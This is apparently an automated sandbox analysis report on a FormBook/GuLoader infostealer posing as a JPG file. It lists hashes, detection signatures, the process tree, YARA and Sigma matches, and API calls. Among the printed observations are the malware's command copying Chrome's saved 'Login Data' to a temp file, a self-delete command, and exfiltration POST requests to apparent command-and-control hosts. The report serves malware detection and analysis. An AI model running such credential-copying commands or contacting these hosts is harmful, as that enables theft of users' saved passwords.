
Analysis Report CI-BL202006-10.jpg.exe

Overview

General Information

Sample Name: CI-BL202006-10.jpg.exe
MD5: 0c20e160f37e9433adfc2dc5351a2571
SHA1: a0c2794e0f0a43461da1d73852d0ba78ec9cbb46
SHA256: 9381fe0c3cf875295a8f591384aa265f7055886439c2f6879dd31585b7c7e8fc

Most interesting Screenshot: (image not reproduced)

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses an obfuscated file name to hide its real file extension (double extension)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • CI-BL202006-10.jpg.exe (PID: 3608 cmdline: 'C:\Users\user\Desktop\CI-BL202006-10.jpg.exe' MD5: 0C20E160F37E9433ADFC2DC5351A2571)
    • CI-BL202006-10.jpg.exe (PID: 5948 cmdline: 'C:\Users\user\Desktop\CI-BL202006-10.jpg.exe' MD5: 0C20E160F37E9433ADFC2DC5351A2571)
      • explorer.exe (PID: 2928 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • svchost.exe (PID: 2644 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
          • cmd.exe (PID: 3836 cmdline: /c del 'C:\Users\user\Desktop\CI-BL202006-10.jpg.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 3132 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 64 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.1181326536.0000000003537000.00000004.00000001.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
  • 0x9644:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000007.00000002.1018825557.000000001F1C0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.1018825557.000000001F1C0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16289:$sqlite3step: 68 34 1C 7B E1
  • 0x1639c:$sqlite3step: 68 34 1C 7B E1
  • 0x162b8:$sqlite3text: 68 38 2A 90 C5
  • 0x163dd:$sqlite3text: 68 38 2A 90 C5
  • 0x162cb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x163f3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.1018825557.000000001F1C0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8358:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x86f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14385:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13e71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14487:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x145ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x927a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x130ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ff2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x199ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.1015572977.0000000000560000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security

Sigma Overview

System Summary:

Sigma detected: Steal Google chrome login data
Source: Process started | Author: Joe Security | Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\svchost.exe, ParentImage: C:\Windows\SysWOW64\svchost.exe, ParentProcessId: 2644, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 3132
Sigma detected: Suspicious Svchost Process
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2928, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2644
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started | Author: vburov | Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2928, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2644

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: CI-BL202006-10.jpg.exe | Virustotal: Detection: 29%
Source: CI-BL202006-10.jpg.exe | ReversingLabs: Detection: 20%
Yara detected FormBook
Source: Yara match | File source: 00000007.00000002.1018825557.000000001F1C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1015418131.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1178893950.0000000002800000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1177510559.0000000000130000.00000004.00000001.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0280F760 FindFirstFileW,FindNextFileW,FindClose, 9_2_0280F760
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0280F759 FindFirstFileW,FindNextFileW,FindClose, 9_2_0280F759

Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 5x nop then clc, 0_2_001C25C9
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 4x nop then pop edi, 7_2_0008C1B6
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 4x nop then pop edi, 7_2_0008C20F
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 5x nop then clc, 7_2_005625C9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then pop edi, 9_2_0280C20F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then pop edi, 9_2_0280C1B6

Source: global traffic | HTTP traffic detected: GET /an0m/?v6Ahr=Y8StOgjefEY/SV/IfIGlo0NtpMFpwQziuZFViwsCv7eH1Z9qFtHxKm+jrwiN5LAcyNwT&Ux=U6oHspOH7x HTTP/1.1 | Host: www.yr-ct.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /an0m/?v6Ahr=w0B5E3Tixu02ndn4wpbRc+mL8evPET7jJX5z0mytnSYVGaemefvLsJvEtAv/xiCLcSa/&Ux=U6oHspOH7x HTTP/1.1 | Host: www.magentos.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: unknown unknown
      Source: global trafficHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.magentos.infoConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.magentos.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.magentos.info/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 36 41 68 72 3d 28 32 31 44 61 53 4b 39 69 65 31 5a 35 39 4c 61 36 38 43 74 47 61 4f 36 37 62 4b 54 48 78 72 45 56 48 6b 6c 6b 56 79 4b 73 58 59 42 41 4b 79 65 55 50 58 54 75 35 57 63 70 68 32 6d 31 51 65 45 49 69 7a 34 71 32 45 56 72 4f 6f 47 71 6d 4f 64 58 53 5a 79 44 38 52 44 43 71 4d 37 77 68 58 76 35 72 4f 72 54 30 72 36 6c 53 69 2d 61 39 68 46 66 37 6a 61 31 57 31 61 4a 62 70 31 7e 45 65 54 62 42 6b 33 38 66 5a 6b 33 71 49 38 48 59 33 49 4f 74 38 57 62 37 75 31 73 4d 4f 54 55 52 4d 30 41 59 70 67 72 34 56 32 45 73 51 6f 58 59 72 41 42 6e 65 76 42 34 28 6d 51 33 58 67 42 67 6f 2d 4b 77 4f 75 4a 63 28 52 58 53 42 64 35 31 6d 42 67 64 76 53 58 47 35 5a 69 57 44 63 5a 63 30 49 28 48 59 6e 67 71 52 63 4a 4d 73 32 6a 6e 65 57 4f 37 52 31 55 4b 49 57 64 50 77 32 28 4f 32 61 63 41 62 59 48 47 39 44 75 4f 57 4d 6b 48 42 49 35 36 46 6f 6d 59 55 56 59 6b 43 53 78 51 4c 69 67 52 4c 63 6b 2d 39 6b 28 51 6c 50 44 59 30 68 31 69 4a 5a 7e 76 70 31 28 55 6b 54 32 6d 42 72 41 42 64 77 4e 6c 55 52 48 2d 61 7a 53 53 37 73 73 30 45 31 36 76 76 72 55 4b 5a 53 50 55 42 66 54 50 7e 6a 45 75 33 39 35 59 49 7a 6e 59 59 55 64 7a 79 5f 5a 37 68 77 32 75 68 62 6f 39 69 4e 36 75 61 70 6c 34 38 7a 75 65 6a 6e 64 6a 74 2d 43 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
v6Ahr=(21DaSK9ie1Z59La68CtGaO67bKTHxrEVHklkVyKsXYBAKyeUPXTu5Wcph2m1QeEIiz4q2EVrOoGqmOdXSZyD8RDCqM7whXv5rOrT0r6lSi-a9hFf7ja1W1aJbp1~EeTbBk38fZk3qI8HY3IOt8Wb7u1sMOTURM0AYpgr4V2EsQoXYrABnevB4(mQ3XgBgo-KwOuJc(RXSBd51mBgdvSXG5ZiWDcZc0I(HYngqRcJMs2jneWO7R1UKIWdPw2(O2acAbYHG9DuOWMkHBI56FomYUVYkCSxQLigRLck-9k(QlPDY0h1iJZ~vp1(UkT2mBrABdwNlURH-azSS7ss0E16vvrUKZSPUBfTP~jEu395YIznYYUdzy_Z7hw2uhbo9iN6uapl48zuejndjt-Cg).
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
      Source: unknownHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.magentos.infoConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.magentos.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.magentos.info/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 36 41 68 72 3d 28 32 31 44 61 53 4b 39 69 65 31 5a 35 39 4c 61 36 38 43 74 47 61 4f 36 37 62 4b 54 48 78 72 45 56 48 6b 6c 6b 56 79 4b 73 58 59 42 41 4b 79 65 55 50 58 54 75 35 57 63 70 68 32 6d 31 51 65 45 49 69 7a 34 71 32 45 56 72 4f 6f 47 71 6d 4f 64 58 53 5a 79 44 38 52 44 43 71 4d 37 77 68 58 76 35 72 4f 72 54 30 72 36 6c 53 69 2d 61 39 68 46 66 37 6a 61 31 57 31 61 4a 62 70 31 7e 45 65 54 62 42 6b 33 38 66 5a 6b 33 71 49 38 48 59 33 49 4f 74 38 57 62 37 75 31 73 4d 4f 54 55 52 4d 30 41 59 70 67 72 34 56 32 45 73 51 6f 58 59 72 41 42 6e 65 76 42 34 28 6d 51 33 58 67 42 67 6f 2d 4b 77 4f 75 4a 63 28 52 58 53 42 64 35 31 6d 42 67 64 76 53 58 47 35 5a 69 57 44 63 5a 63 30 49 28 48 59 6e 67 71 52 63 4a 4d 73 32 6a 6e 65 57 4f 37 52 31 55 4b 49 57 64 50 77 32 28 4f 32 61 63 41 62 59 48 47 39 44 75 4f 57 4d 6b 48 42 49 35 36 46 6f 6d 59 55 56 59 6b 43 53 78 51 4c 69 67 52 4c 63 6b 2d 39 6b 28 51 6c 50 44 59 30 68 31 69 4a 5a 7e 76 70 31 28 55 6b 54 32 6d 42 72 41 42 64 77 4e 6c 55 52 48 2d 61 7a 53 53 37 73 73 30 45 31 36 76 76 72 55 4b 5a 53 50 55 42 66 54 50 7e 6a 45 75 33 39 35 59 49 7a 6e 59 59 55 64 7a 79 5f 5a 37 68 77 32 75 68 62 6f 39 69 4e 36 75 61 70 6c 34 38 7a 75 65 6a 6e 64 6a 74 2d 43 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
v6Ahr=(21DaSK9ie1Z59La68CtGaO67bKTHxrEVHklkVyKsXYBAKyeUPXTu5Wcph2m1QeEIiz4q2EVrOoGqmOdXSZyD8RDCqM7whXv5rOrT0r6lSi-a9hFf7ja1W1aJbp1~EeTbBk38fZk3qI8HY3IOt8Wb7u1sMOTURM0AYpgr4V2EsQoXYrABnevB4(mQ3XgBgo-KwOuJc(RXSBd51mBgdvSXG5ZiWDcZc0I(HYngqRcJMs2jneWO7R1UKIWdPw2(O2acAbYHG9DuOWMkHBI56FomYUVYkCSxQLigRLck-9k(QlPDY0h1iJZ~vp1(UkT2mBrABdwNlURH-azSS7ss0E16vvrUKZSPUBfTP~jEu395YIznYYUdzy_Z7hw2uhbo9iN6uapl48zuejndjt-Cg).
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 10 Jun 2020 06:58:19 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 295Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 6e 30 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 61 67 65 6e 74 6f 73 2e 69 6e 66 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /an0m/ was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.magentos.info Port 80</address></body></html>
Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: svchost.exe, 00000009.00000002.1179348625.0000000002A68000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.1179257260.0000000002A2C000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico
Source: explorer.exe, 00000008.00000002.1178314312.0000000000CF0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: svchost.exe, 00000009.00000002.1179305167.0000000002A55000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: svchost.exe, 00000009.00000002.1179305167.0000000002A55000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/de-ch/ocid=iehpC:
Source: svchost.exe, 00000009.00000002.1179305167.0000000002A55000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/ocid=iehp
Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: svchost.exe, 00000009.00000002.1181386137.000000000382D000.00000004.00000001.sdmp | String found in binary or memory: https://hm.baidu.com/hm.js?fc21fbd0fe5055ebb448b1b503222a26
Source: CI-BL202006-10.jpg.exe, 00000007.00000002.1015572977.0000000000560000.00000040.00000001.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=CEA27E82624AB94F&resid=CEA27E82624AB94F%21175&authkey=AGKupoV

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000007.00000002.1018825557.000000001F1C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1015418131.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1178893950.0000000002800000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1177510559.0000000000130000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.1181326536.0000000003537000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
Source: 00000007.00000002.1018825557.000000001F1C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.1018825557.000000001F1C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.1015418131.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.1015418131.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1178893950.0000000002800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1178893950.0000000002800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1177510559.0000000000130000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1177510559.0000000000130000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_001C2A49 NtProtectVirtualMemory, 0_2_001C2A49
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_001C0F78 NtWriteVirtualMemory, 0_2_001C0F78
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_001C01AE EnumWindows,NtSetInformationThread,TerminateProcess, 0_2_001C01AE
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_001C2DF6 NtResumeThread, 0_2_001C2DF6
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_001C114C NtWriteVirtualMemory, 0_2_001C114C
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_001C2DFC NtResumeThread, 0_2_001C2DFC
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_001C01E6 NtSetInformationThread,TerminateProcess, 0_2_001C01E6
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A750 NtCreateFile,LdrInitializeThunk, 7_2_1F45A750
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A700 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_1F45A700
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A720 NtResumeThread,LdrInitializeThunk, 7_2_1F45A720
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A610 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_1F45A610
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A6A0 NtCreateSection,LdrInitializeThunk, 7_2_1F45A6A0
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A540 NtDelayExecution,LdrInitializeThunk, 7_2_1F45A540
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A560 NtQuerySystemInformation,LdrInitializeThunk, 7_2_1F45A560
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A5F0 NtReadVirtualMemory,LdrInitializeThunk, 7_2_1F45A5F0
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45B470 NtOpenThread,LdrInitializeThunk, 7_2_1F45B470
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A410 NtQueryInformationToken,LdrInitializeThunk, 7_2_1F45A410
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45ACE0 NtCreateMutant,LdrInitializeThunk, 7_2_1F45ACE0
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A480 NtMapViewOfSection,LdrInitializeThunk, 7_2_1F45A480
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A4A0 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_1F45A4A0
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A360 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_1F45A360
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A3E0 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_1F45A3E0
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A240 NtReadFile,LdrInitializeThunk, 7_2_1F45A240
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A2D0 NtClose,LdrInitializeThunk, 7_2_1F45A2D0
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A710 NtQuerySection, 7_2_1F45A710
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A780 NtOpenDirectoryObject, 7_2_1F45A780
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A650 NtQueueApcThread, 7_2_1F45A650
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A6D0 NtCreateProcessEx, 7_2_1F45A6D0
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45BD40 NtSuspendThread, 7_2_1F45BD40
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A520 NtEnumerateKey, 7_2_1F45A520
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A5A0 NtWriteVirtualMemory, 7_2_1F45A5A0
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A460 NtOpenProcess, 7_2_1F45A460
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A470 NtSetInformationFile, 7_2_1F45A470
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45B410 NtOpenProcessToken, 7_2_1F45B410
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A430 NtQueryVirtualMemory, 7_2_1F45A430
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A350 NtQueryValueKey, 7_2_1F45A350
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A370 NtQueryInformationProcess, 7_2_1F45A370
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A310 NtEnumerateValueKey, 7_2_1F45A310
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A3D0 NtCreateKey, 7_2_1F45A3D0
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A260 NtWriteFile, 7_2_1F45A260
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A220 NtWaitForSingleObject, 7_2_1F45A220
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45BA30 NtSetContextThread, 7_2_1F45BA30
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A2F0 NtQueryInformationFile, 7_2_1F45A2F0
